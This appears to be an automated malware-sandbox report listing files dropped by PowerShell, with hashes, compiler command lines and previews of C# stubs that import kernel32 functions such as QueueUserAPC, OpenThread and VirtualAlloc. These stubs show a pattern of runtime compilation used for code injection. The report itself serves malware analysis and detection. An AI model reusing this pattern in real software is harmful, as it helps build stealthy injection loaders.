                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.225964153941322
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpvQYOzxs7+AEszIN723fpvQYt9:p37Lvkmb6K2ae9WZETae+9
                            MD5:E417A790F5ECFFC57E19553220860204
                            SHA1:BB0C8AD3294335CCC3EBCA484E82CBC3B82212BC
                            SHA-256:531B60C5D5234C2C2E5D19FC1786C018D6EFCA1EE3A85072C7B57D5DE6B1CA53
                            SHA-512:2EDCEC5482641ADF4BF396846A92AED21D928CF60D61B7013190ECAC5C8962123B674EA20B568B227FA2D32AA95494FA887BAF666E45A589E32C41DACE567087
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs"
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6323976125718667
                            Encrypted:false
                            SSDEEP:24:etGSv8+mUE7R85z7woel/gO4/eiDPtkZfH8eWDZ0WI+ycuZhNcakSoPNnq:69XE7S5gGUiyJH8eAZX1ulca3Qq
                            MD5:7C00DECE0E6267D12BE7E759F865EBA6
                            SHA1:056B3240A7F7F9470CCD40E6C3540B0EAE77D0CC
                            SHA-256:952644239DF6BE31335F7E1AC3324A4D0E6424ED83296800B78644FC6DF6D5B0
                            SHA-512:C92B7CA867B544EFEEE1BC7BD1CBB1328873152907DFAFEDA79F9E5B44298974999B1CD61B99D2FD371C8E6D7A50EB0A6B618C536C5ACD656F956208F12366EC
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.310389610172864
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2atETaL4KaM5DqBVKVrdFAMBJTH:Akka6CtE+L4KxDcVKdBJj
                            MD5:710CC09857DFFC53DC33F785B737101D
                            SHA1:9CB5D3A127ACB37BAD9420BAB670D51F3AE02B26
                            SHA-256:065EC096833AAAD0FF61129A37E9C85A65A1E228F1D520683BEEBE57D5DEFE1F
                            SHA-512:1BED7D3D136AED086A1D61ABE2036C4850A886DA245BA8C3206E8AF988F85E4A8C2496928178863EF765F87AF472DC0E98BFAC83360C3094C0EB4AAEA3CB5D3B
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0921663918005518
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynwak7Ynqq61PN5Dlq5J:+RI+ycuZhNlwakS61PNnqX
                            MD5:8D38707C9DA074E8298A09CCEFE267D4
                            SHA1:4698BF2772175E64EA531AAF69A1830AB7A62240
                            SHA-256:E404495A4BA5D32217D87538BD4DB72E0CE80B741CC5318D16F621E1245A1310
                            SHA-512:EAD5798174C105EBD2FDC5EB87060C65209E35841BF5EE8627CDECF11F2F7A93FE10535B8CCED239987DBB9CCCF757A47378F726947A0E7FE1CD575CA19CBDE3
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.173224995113562
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fXWsor0JUzxs7+AEszIN723fXWsorO:p37Lvkmb6K2aP4Q+WZETaP4q
                            MD5:6BE56DACEFC57A712EA48F043E87C783
                            SHA1:D0681E001D2DABEF7D2E3993992EFAE42F65B518
                            SHA-256:9D8DC9E1EF8194163AD1488C6F630D49868ACCA608929CF85C3D080FB3FDE844
                            SHA-512:B0685B3E0CBD55C2DBDD7FB40F532CB62207A82FCB5A76D6451936A752200CC2C3CFB250D549A9A10CBE148FB6085D06E689FA4B37BEDFC32FBADE7D3ADD2CDC
                            Malicious:true
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs"
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6332356785832784
                            Encrypted:false
                            SSDEEP:24:etGSl8+mUE7R85z7woel/gTE4/eiDPtkZfmPENDZ0WI+ycuZhNlwakS61PNnq:67XE7S5gGT6iyJmPiZX1ullwa36vq
                            MD5:F5AA19BA9E19FFD0C554993566FCB9A1
                            SHA1:0A6CD2AF2C18AD6717A9F54CE6F1EC9D05DAAAA3
                            SHA-256:AA37819283565FA6E4FED32DFBD5BC46AFEE33457A0A05229EA1D74C112D7DF3
                            SHA-512:5BA356DE7E941FFB7F8A62E93612C01362DEC9A548CABFEE616A004EBC48D055909000D1C1BF0254206B25895D4A111A3204A4EC447B27DC8CFA19B5AC700D88
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.301489549454478
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2apETawKaM5DqBVKVrdFAMBJTH:Akka6CpE+wKxDcVKdBJj
                            MD5:B17FFB955F30A845D8BCF1C881AFD851
                            SHA1:13338CBE5E707CF0B7033C997E84A6AD19C18FF9
                            SHA-256:9AE5AB954FB134CE28AEC0E5F5F78551A6C27DDD0E2DA686F310B7C8C316F09D
                            SHA-512:E5A107C314E7E311314E36D0E7274F2C95DF94A65B0EFC1150ED7CF5537028918668CDBC9D740C0629AE128E31083C93A7ECCC663E9F13C21BE81D8F4382E681
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0890365915861624
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryH7ak7YnqqC0PN5Dlq5J:+RI+ycuZhN5akSnPNnqX
                            MD5:30A3097118EDB11AB1993E197C9073FA
                            SHA1:615B7D6D7126E88ABA3F17B6973630F89852F0AA
                            SHA-256:3B1178DF0B42B9FE32931ECD764E022C5C3993757D9E08888154E8CFE7DC3ACB
                            SHA-512:169145C229E843797950547FA2B91AD5F73A7874E3D498859748A7C29F41A7F61CB7EF60CFBBDA05818A38394BCBEA483363C1D46DAAE992CC938BA05FD190C5
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.19959834421907
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpyAHUzxs7+AEszIN723fpy2:p37Lvkmb6K2axybWZETaxy2
                            MD5:5E6CD1F7B44B6E3B4C22EAF18C17B4E4
                            SHA1:7D5CB5F73BB6D2E8EC75A4ED779F3B8CF57CF23B
                            SHA-256:1FCA6CEC3FAF3F369A605C055F0EE65690ED9838A18EE01BA3D8B81315A211E2
                            SHA-512:5FABA37FFE22F142287B53D9A18F828EA5101576D953C0A10945F892523E5C39D6B7503BDC0BA004ACE656A498846AD74B2C284FD3B18AD6A7AD51ED5A15E0E1
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs"
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.6318992955586533
                            Encrypted:false
                            SSDEEP:24:etGSQ8+mUE7R85z7woel/gf4/eiDPtkZfYmgfDZ0WI+ycuZhN5akSnPNnq:6aXE7S5gGZiyJYmoZX1ul5a31q
                            MD5:C9304AA657C4D4A6CB3A3F3E0BB4D7EF
                            SHA1:C8D07D9C483B5EE7CBB5B92B2BB07EB7A1EB48FD
                            SHA-256:9B80595D0F55E78C8CB1DF004FB37D5A94AF1B19C2C8806F426B2A6BA51A29E2
                            SHA-512:3E66DC953433A11FE0083B2D40935B147D9BF7CE93E11F2EBC47F4EB1B5362384E3889C73518910B010457D9961FE17860D58CFA38B3E8C4207F96462B848E74
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                            C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.292537978034834
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aLETa2KaM5DqBVKVrdFAMBJTH:Akka6CLE+2KxDcVKdBJj
                            MD5:71B3F041076E3F95CFFD60D5175E75DF
                            SHA1:3E8BB427FD0CF04864317DB344053003824DFAA0
                            SHA-256:94857FB771A06BB6B94A77618220A25D5BED278081EDD5A4CC93ECF424D175A9
                            SHA-512:1DE93694D194DCF73BD6190B41C5E0DA69CDEB075E7E7338E51913775DBF3879571F159BC24A991F6E499E3D72CD1F8233B196C057C2FDDBDB9F9F0226EB523F
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.222834284403675
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f51n0zxs7+AEszIN723f5/H:p37Lvkmb6K2ah10WZETah/H
                            MD5:88C71B6719907B92C99029F9DF4C3781
                            SHA1:667EDB93A80D214FCD8C7DB39F368586A5FFFD2D
                            SHA-256:D8001B915AA15E64B32C56331B6749F7D4ADAB361228DDB3B81C1DAFEB82BDE3
                            SHA-512:6FF6E9812F843FA1AB77B3F176C58F5CABD9A93DCF344EE9AFF4943DB59BBD7A260545445B561A23D537C04F4DAFA79A9ADC45E52CDFA7695D20AA434F34B805
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs"
                            C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.314771609463602
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2avVETapOKaM5DqBVKVrdFAMBJTH:Akka6C9E+pOKxDcVKdBJj
                            MD5:FBF42D3DC0BCD15D5634FB6E9DCE0B89
                            SHA1:A1E67FC78A33DC2FF510187D9A143B1980A198D8
                            SHA-256:7794B8E2C92DCFAA2E6E0F070A71F1B82EB43D0E1B962A1413E3D7B3DDFA1D97
                            SHA-512:8EB85167B7225987874B8EBDEE3EAAA5F7B7B476FBC4855C1E2A202A292B27BA7C398D49027F7647CA70CB217507EDFEE5287FBBF4F4432146C119FCEC142648
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m501nuko\m501nuko.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0882008464403055
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryC5ak7YnqqPOPN5Dlq5J:+RI+ycuZhN05akSPOPNnqX
                            MD5:B6905AF467395A55B06B7D723D6F9071
                            SHA1:DE3FE20DBDC687C7434A1C7598C3EE0CFBBA6ECA
                            SHA-256:6024F928917A5852278333793A6AC3BB6742E86C4F0095B7467BA1E148AB32B6
                            SHA-512:066A42CA9AABF4DF85EAF3B698E80D21F512CDA444C59FA46AA3FE478CDCA0E7998806C08B98CFA2069BA98137984EE352C3C715166DBD04123AB094E42C97E6
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):414
                            Entropy (8bit):5.049516587690195
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                            MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                            SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                            SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                            SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                            C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.17577930886851
                            Encrypted:false
